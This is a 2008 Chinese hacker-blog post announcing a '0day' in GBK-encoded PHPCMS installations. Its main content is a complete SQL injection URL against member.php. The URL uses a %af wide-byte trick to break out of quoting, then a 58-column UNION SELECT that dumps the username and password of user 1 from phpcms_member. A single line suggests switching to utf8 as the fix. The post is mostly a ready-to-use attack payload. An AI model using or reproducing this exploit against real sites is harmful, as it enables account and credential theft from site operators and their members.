导航

小帥&Seeflood的贼窝

小帥&Seeflood的贼窝 WEB2.0|0kee|Script|0day|Hacker|book|study|SQL|FUCK|bad boy|Injection|php|asp|流氓

« 博客又回来了来了又得走了 »

phpcms_gbk_0day >> 都是编码惹的祸

2008年8月18日 18:39:20 发布:admin

影响范围:GBK用户

 Author: 小蟑螂

信息来源:零客网安

--------------------------------

参考:http://www.80sec.com/php-coder-class-security-alert.html

相信已经有不少人射到它了。不多说鸟。有多处可利用的地方,在此举出一例。

http://phpcmsroot/member/member.php?username=0kee%af'/**/union/

**/select/**/1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,

25,26,27,28,29,30,31,32,username,34,password, 36,37,38,39,40,41,42,43,

44,45,46,47,48, 49,50,51,52,53,54, 55,56,

57,58/**/from/**/phpcms_member/**/where/**/userid=1/* 建议:采用utf8字符集。

Tags: phpcms_gbk_0day >> 都是编码惹的祸  
固定链接 | 分类:Script study | 评论:0 | 引用:0 | 浏览:
  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog .Theme from Google黑板报 By Washun

Copyright 2008-2009 http://www.xshacker.com.cn Some Rights Reserved.

Search

控制面板

最新评论及回复

最近发表